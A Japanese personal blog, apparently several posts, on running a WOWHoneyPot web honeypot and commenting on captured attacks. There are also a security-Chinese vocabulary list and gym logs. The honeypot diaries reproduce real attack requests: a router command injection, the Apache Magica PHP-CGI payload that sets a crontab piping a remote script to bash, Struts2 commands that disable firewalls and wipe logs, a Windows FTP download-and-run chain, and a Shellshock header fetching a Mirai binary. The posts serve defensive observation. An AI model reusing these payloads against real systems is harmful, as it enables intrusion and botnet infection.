ハニーポットでよく見るユーザーエージェントについて調べた

honeypot Jorgee security user-agent ZmEu 技術メモ

よく見かけるユーザーエージェントについて調べてみた

今回は少し趣向を変えて…… ハニーポットのログでよく見かけるユーザーエージェントについて調べてみました。

ZmEu

項目名 内容
UserAgent ZmEu
パス /phpmyadmin/scripts/setup.php, /pma/scripts/setup.php など

最初に残していく /w00tw00t.at.blackhats.romanian.anti-sec:) のログが特徴的な脆弱性スキャナです。Webサイト等を運営している方であれば、ログにこの文字列があるのを見たことがある方も多いのではないでしょうか? アクセス先はphpmyadminのセットアップスクリプトのほか、SSHパスワードのブルートフォースアタックも行っているとの情報もあります。英語版 Wikipedia にはページがあるくらいなので、おそらく有名なスキャナなのでしょうね。

https://en.wikipedia.org/wiki/ZmEu_(vulnerability_scanner)

ルーマニア生まれのツールで、ユーザーエージェントにもある「ZmEu」という名前は、ルーマニアの民話に出てくるドラゴンに似た生き物を表しているそうです。

Jorgee

項目名 内容
UserAgent  Mozilla/5.0 Jorgee
パス /phpmyadmin2017, /phpmyadmin2018, /phpmanager など

こちらもphpmyadmin脆弱性を探っているようです。

NYU

項目名 内容
UserAgent NYU
パス /RPC2, /cgi-bin/php?-d+allow_url_include=on..., /invoker/JMXInvokerServlet

けっこう多様なパスにたいしてアクセスしてきている感じですね。/cgi-bin/php?-d+allow_url_include=on...は、2月の観察日記 で紹介したApache Magicaでしょうか。

muhstik-scan

項目名 内容
UserAgent  Mozilla/5.0 muhstik-scan, muhstik/1.0
URL  https://github.com/phukd/muhstik
言語 C
パス /mysql/admin, /mysql/dbadmin, /phpmyadmin, /program, /webdav, /admin/sysadmin/

データベース系を中心に、あり得そうなパスに向けて一斉にアクセスをして、探りをかけてきています。

Indy-Library

項目名 内容
UserAgent  Mozilla/3.0 (compatible; Indy Library)
パス /, /manager/html

2月の観察日記 で挙げた「Tomcatのアプリケーションマネージャを狙ったブルートフォース攻撃」を行ってきたのがこのUAです。以降わりと頻繁にアクセスしてきているようです。

zgrab

項目名 内容
UserAgent Mozilla/5.0 zgrab/0.x
URL https://github.com/zmap/zgrab
言語 Go
パス /

zmapというスキャナとともに動作する、アプリケーションレイヤのスキャナーのようです。

masscan

項目名 内容
UserAgent masscan/1.0 (https://github.com/robertdavidgraham/masscan)
URL https://github.com/robertdavidgraham/masscan
言語 C
パス /

速さに定評があるTCPポートスキャナ

It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.

6分で全体スキャン、すごい速さです。

sysscan

項目名 内容
UserAgent sysscan/1.0 (https://github.com/robertdavidgraham/sysscan)
URL https://github.com/robertdavidgraham/sysscan
言語 C?
主に観測されたログ /

githubのリンクはリンク切れとなっていました。sysscanの後継がmasscanということなのかもしれないです。

まとめ

アプリケーションの脆弱性を狙ったもの、ポートスキャンを目的としたものなど、様々なユーザーエージェントからのアクセスを受けていることが改めてわかりました。また、一部のユーザーエージェントごとに一定の特徴が見られそうですね。(データベース系の脆弱性を中心にアクセスしているなど) ユーザーエージェント毎の集計等も、今後は取っていきたいと思いました!

ハニーポット観察日記 (2018年1月分)

honeypot php security WOWHoneyPot 技術メモ

遅くなりましたが

ハニーポット観察日記、2018年1月分です。

D-LINK DIR-610 ルータの脆弱性を狙った攻撃

POST /command.php HTTP/1.1
Accept: */*
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%45%30%5C%5C%78%31%34%5C%5C%78%30%30%5C%5C%78%30%30%5C%5C%78%30%30%20%3E%3E%20%64%72%6F%70%20%26%26%20%65%63%68%6F%20%4F%4B

cmd=$cmd の形式のパラメータを受け付けているページ command.php があり、ここでコマンドを指定すると認証等を介さずOSコマンドを実行できてしまう、ということだそうです。どうしてこんな脆弱性が出来てしまったのでしょうね……

cmdのところをURLデコードするとこんな感じになります。

cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

/var/tmp 配下で、610cker.txt という名前のテキストファイルを作成し、最後にテキストファイルの内容を出力しています。このコマンド自体にはさほど意味はなさそうで、どちらかというとこのコマンドによって、脆弱性の有るサーバーを選り分けている感じですね。

610cker.txt という名前はターゲットとしているルーターの型番を示しているという話もあるようです。以下サイトの解説が詳しいです。

参考 : Observing Large-Scale Router Exploit Attempts | ProtectWise™

Apache Magica (CVE-2012-1823) 攻撃

魔法少女アパッチ☆マギカ攻撃の愛称(?)で親しまれている、PHP脆弱性を狙った攻撃を、私のハニーポットでも観測することができました。 PHPer としてもこれは見逃すわけにはいきません!

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=%22%22+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
Host: localhost
Accept: */*
User-agent: NYU
Content-Length: 256
Content-Type: application/x-www-form-urlencoded

<?php system("crontab -r; wget -V&&echo \"1 * * * * wget -q -O - http://internetresearch.is/robots.txt?php 2>/dev/null|bash;\"|crontab -;wget -V||curl -V|echo \"1 * * * * curl -s http://internetresearch.is/robots.txt?php 2>/dev/null|bash;\"|crontab -"); ?>*

脆弱性の詳細については、徳丸浩さんのブログで詳しく書かれているので、そちらをご参照ください。 CGI版PHPに対する魔法少女アパッチマギカ攻撃を観測しました | 徳丸浩の日記

毎時1分にファイルをダウンロードして実行しているようです。こういうログを見るとPHPのバージョンアップとか、堅牢なコーディングとか、ちゃんとやらなくてはなーと心から思いますね……。

Tomcatのアプリケーションマネージャを狙ったブルートフォース攻撃

GET /manager/html HTTP/1.1
Content-Type: text/html
Host: xxx.xxx.xxx.xxx
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic YWRtaW46dG9tY2F0

Basic認証の部分は

など、ありふれたIDとパスワードが連続してアクセスされていました。こういうログを見るとIDとパスワードとか、ちゃんと設定しなくてはなーと心から思いますね……

おわりに

というわけで2回目のハニーポット観察日記でした。次回は少し趣向を変えて、ツールに着目してログを観察してみようかな〜と思っています。ではまた!

技術系中国語の勉強

chinese security 技術メモ

今日はちょっと変わり種で語学系の投稿です。ハニーポットに中国からのアクセスがあり、それについて調べているうちに関係する中国語をいくつか覚えたので、備忘録代わりに単語をメモしておきます。

軟件

software

手机

携帯電話

技术

技術

漏洞

抜け穴。セキュリティホールのことも、この言葉で表現されているよう

ex. Struts2漏洞 : Struts2脆弱性

黑客

hacker

発音が「heī kè」で hacker に近いからこの字になっているという話

cf. 黑客工具 : hacker tools

解压

圧縮されたファイルを展開すること

密码

暗号, パスワード

ex. 解压密码 : 圧縮ファイルの展開用のパスワード

远程

リモートコマンド

侏儒

見識のない人をあざけっていう語

すみません、これだけはMR.ROBOTネタです……(毎度MR.ROBOTの話ばかり挟んですみません、大好きなんです)。

ダーリーンがダークアーミーと連絡を取ろうと試みているときに、チャット内でダーリーンの発言は「侏儒」の発言として表示されていました。「ゲストユーザー」を貶めた言い方、というところなのですかね。

中国語サイト、ざっと雑に漢字を読むだけでも、なんとなく意味を拾えるものがあったりして面白いです。

Struts2远程命令执行漏洞分析及防范」 は、 「Struts2 のリモートコマンド実行の脆弱性の分析、および対処法について」というところでしょうか。「Struts2漏洞利用工具 解压密码」というのも見つけましたが……、これはあまり深入りしないほうが良さそうですかね。

中国語文法や発音については、学んだことがないのでよくわからないのですが、こうしてサイトを見ているともっと勉強したくなりますね。時間を見つけてNHK中国語講座でも見ようかしら……。最近、なんだか興味が多方面に広がっていてはてしないです。苦笑

ハニーポット観察日記 (2017年12月分)

honeypot security shellshock Struts2 WOWHoney 技術メモ

新年のご挨拶

明けましておめでとうございます! 平成30年も k-anz.net をよろしくお願いします!

さて、さっそく前回の宣言通り、ハニーポットの観察記録を書きたいと思います。一旦、前月分(2017年12月分)のログを対象に、気になったものや、数の多かったものをピックアップしてコメントしていきます。

Apache Struts 2 の脆弱性 (S2-045) を狙った攻撃

遠隔の攻撃者が、細工した HTTP リクエストを送信することで、Apache Struts 2 を使用するアプリケーション (Strutsアプリケーション) を実行しているサーバにおいて、任意のコードを実行する可能性があります。

Apache Struts 2 の脆弱性 (S2-045) に関する注意喚起 (JPCERTの記事にジャンプします)

もっとも多かったのがこの脆弱性を狙った攻撃でした。Content-TypeヘッダにOGNL式を含むコードが指定されており、脆弱性を持つ Struts2 アプリケーションの場合、記載されたコマンドが実行可能となってしまいます。実行を試みられていたコマンドにいくつかパターンがあったのでご紹介します。以下、コマンドのみを抜粋して記載します。

その1

whoami
service iptables stop
/etc/init.d/iptables stop
mv /bin/netstat /bin/tstat
mv /usr/bin/wget /usr/bin/scet
mv /usr/bin/scp /usr/bin/lcp
mv /usr/bin/curl /usr/bin/cuy
echo > /var/log/wtmp
echo >/var/log/wtmp
echo > ./.bash_history
history -c

同一IPから連続したアクセスがあり、(1) whoami (2) service ipdtables stop ... という形で順に攻撃が来ていました。こういうのって、はじめに whoami で攻撃可能なプログラムかどうかを判断し、そのあとから実作業に入っているのですかね……?

ファイアウォールを止めて、mv ~ 以降は各種コマンドの書き換えをしているのでしょうか。最後は、一時ファイルや履歴などの痕跡をクリアしてさようなら、ですね。

その2

/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://xxx.xxx.xxx.xxx:20081/inten;chmod 777 inten;./inten;

ファイアウォールを止めたあとにファイルをダウンロードし、実行権限つけて実行、という流れですね。ダウンロードを試みられていたファイルがどのようなものかは確認が取れませんでした……。

その3

cmd /c @echo open h.c.ac.cn>>COOKECOOKE.dat&@echo 123>>COOKECOOKE.dat&@echo 123>>COOKECOOKE.dat&echo bin>>COOKECOOKE.dat&@echo get 7ua.exe>>COOKECOOKE.dat&@echo bye>>COOKECOOKE.dat&@echo 7ua.exe>>COOKECOOKE.dat&@ftp -s:COOKECOOKE.dat&del COOKECOOKE.dat&7ua.exe&7ua.exe

こちらは Windows 向けのコマンドのようですね。やろうとしていることは、その2のログとそれほど変わらないようで、ファイルをダウンロードして実行、最後に使用したファイルを削除、という感じでしょうか。

ShellShock を狙った攻撃

GET / HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'
Connection: close

bashに存在する脆弱性 「Shellshock」 | トレンドマイクロ セキュリティブログ

User-Agent にコードを仕込む形は、典型的な ShellShock を狙った攻撃のようですね。wget, curlなど手段を変えながら、特定のサイトへアクセスを試行しています。

「infect-cctv=mirai-botnet.bin」というクエリパラメータが気になります。「Miraiボットネット」というのは、2016年秋頃に話題になった、IoTデバイスを踏み台としたDDoS攻撃を行うボットネットだそうなのですが、このアクセスもそれに関連したものなのでしょうか……

時候の挨拶?

PATCH /your-software/and-have-a-great-2018/from-the-folks-at-34c3 HTTP/1.0
User-Agent: #34c3
Accept: */*

"Have a great 2018 from the folks at 34c3"

「良いお年を」のご挨拶でしょうか。ご丁寧にどうも……という感じですね。

34c3 というのは、「34th Chaos Communication Congress」のこと。「Chaos Communication Congress」とは、「Chaos Computer Club」というハッカー集団のコンペティションだそうです。要出典のマークだらけですが、カオス・コンピュータ・クラブの Wikipedia 記事の内容はなかなかすごいですね。

CCCが世界的に有名になったきっかけは、彼らがある銀行[どこ?]のコンピュータネットワークに侵入し、オンラインアカウントのID・パスワードを取得、見事現金を得るのに成功するという事件だった[いつ?]。その事件の翌日、彼らは得た金を銀行に返却した。

カオス・コンピュータ・クラブ - Wikipedia

まるでMR.ROBOTの5/9攻撃みたいじゃないですか……! どちらかといえば CCC の事件のほうが先なのでしょうけど。

おわりに

というわけではじめてのハニーポット観察日記でした。「セキュリティに留意したコードを書く」といったことは、開発の仕事でも意識しているところではあるのですが、こうして実際のログを観察してみると、より一層気持ちが引き締まりますね。

また月次くらいのペースで、新しく紹介記事を書けたらと思っています。ではでは。

Google Compute Engine上にWOWHoneyPotを立てた

honeypot security WOWHoneyPot 技術メモ

WOWHoneyPotを立てた

@morihi_soc さん作のハニーポットWOWHoneyPot をGoogleComputeEngine上に立てて公開してみました。

ハニーポットとは?

元来は「蜜壺」「甘い罠(わな)」を意味するが、ITセキュリティの分野では、サイバー犯罪者たちの攻撃をおびき寄せる「おとり」、仕掛けを指す。攻撃者の侵入を監視して動向を調査したり、仕掛けられたマルウェアの挙動を分析することによって、対策に役立たせることを目的とする。 ハニーポット | マルウェア情報局

なぜやろうと思ったの?

最近、海外ドラマの『MR.ROBOT』にハマって、セキュリティ分野に興味を持ったからです(笑)。

『MR.ROBOT』の紹介は本題から逸れてしまうのであまりしませんが……この作品、主人公が「セキュリティエンジニア、裏ではハッカー」という人物です。ハッキングのシーンが結構リアルに描かれていて、Kali Linuxなど、実際にセキュリティ業界で見かけるであろうツールも作中に出てきます。

私は、ふだんは基本的にWebアプリケーション開発のエンジニアをしているので、セキュリティ分野に特化した知識はあまりないのですが、作中に出てくる言葉を拾っていくうちに興味が広がり、ハニーポットを運用してみたいと考えるようになったのです。

どのハニーポットにしようか考えていたときに、ちょうどWOWHoneyPotの紹介のスライドを見つけまして。Webハニーポットであれば(Webアプリエンジニアとしても)取っつきやすいし、今後に活かせる面もあるかもなーと思い、構築してみました。

実は最初はT-Potもやってみようと思っていたのですが、(1)要求スペックが高いので予算面で少し厳しそう という点と、(2)全部入りすぎていて逆におもしろみに欠けるのではないか という点を考えて止めにしました……笑

今後の目標

なにか攻撃のしるしを見つけたら、観察日記をつけてみようと思います。あとログ集計の仕組みは何かしら考えたいですね。まあぼちぼちやっていきます。

2017/12/10のトレーニング記録

training トレーニング記録
  • マシントレーニング
    • レッグエクステンション 22.5kg 10回×3set
    • レッグカール 22.5kg 15回×3set
    • ベンチプレス 13.5lg 15回×2set, 10回×1set
    • アッパーバック 25.0kg 10回×3set
    • クランチ 20回×2set
  • 有酸素運動

* エアロバイク 20min

2017/11/29のトレーニング記録

training トレーニング記録
  • マシントレーニング
    • レッグエクステンション 18.0kg 15回×3set
    • レッグプレス 40.5kg 15回×3set
    • レッグカール 18.0kg 15回×3set
    • ラットプルダウン 18.0kg 15回×3set
    • チェストプレス 30.0kg 15回×3set
  • スタジオレッスン

水曜のボディパンプに行くのが習慣になりつつある。良き